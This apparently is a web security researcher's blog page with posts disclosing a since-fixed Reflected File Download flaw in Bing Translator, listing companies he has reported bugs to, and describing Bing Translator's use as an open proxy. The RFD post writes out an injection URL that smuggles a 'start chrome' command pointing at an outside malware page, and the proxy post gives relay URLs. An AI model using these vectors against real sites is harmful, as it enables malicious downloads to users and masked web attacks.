David Sopas – Web Security Researcher

microsoft

19/01/16 Advisories # , , ,

Bing Reflected File Download

Bing Reflected File Download

When using Bing online translator I noticed a XHR request on my browser that caught my attention:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499

On which reflected on the screen:

jQuery111207287312552798539_1444907172498();

As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm

On which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

0 likes no responses
07/01/16 Swag # , , , , ,

Companies that I’ve helped improve their security

Companies that I’ve helped improve their security

Google, Yahoo!, eBay, Microsoft, Etsy, Nexmo, Weebly, Edmodo, HackerOne, Desk, Adobe, ArubaNetworks, Condé Nast, Linkedin, Acunetix, SendGrid, Rocky Bytes, DepositFiles, Workable, MailChimp, Prestashop, HP, Kaspersky, OLX, RunKeeper, Tumblr, ESET, Symantec, Dowjones, Issuu, Jobs.cz, Alexa/Amazon, McAfee, Booking, AVG, Panda Security, Hootsuite, Circle, DoSomething, Zendesk, Nokia, 123 Contact Form, FoxyCart, Orkut, Segment.io and SilentCircle.

The other ones are private 🙂

0 likes no responses
16/10/15 Tips and Tricks # , , ,

Free online proxy using Bing Translator

Free online proxy using Bing Translator

This method is already known on many other servers like Google Translator and other online services.
I don’t know if I might consider this to be a security issue. Let’s call it a special Bing Translator feature 🙂

Using Bing Translator service anyone can use their IP addresses as a proxy. Malicious users could use this method as a plataform to launch web attacks like (xss, sql injection, etc). Also users could use this service to visit blocked sites.

Example:

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/XXE

I noticed that on my webserver logs that I had two requests made by 157.56.2.63 [msnbot-157-56-2-63.search.msn.com]

Other example to show the IP of the user (ip.php just shows $_SERVER[“REMOTE_ADDR”]):

http://www.microsofttranslator.com/bv.aspx?from=en&to=en&a=http://www.davidsopas.com/poc/ip.php

I notice that if you make both languages in the same pair (i.e., en-en for English to English), the translation is effectively skipped but the requested web content is still served from Microsoft servers.

Google in the past had the same issue. They fixed the pair issue part to prevent misuse of their translation service. Now in Google Translator you always need to choose a different language every time.

0 likes no responses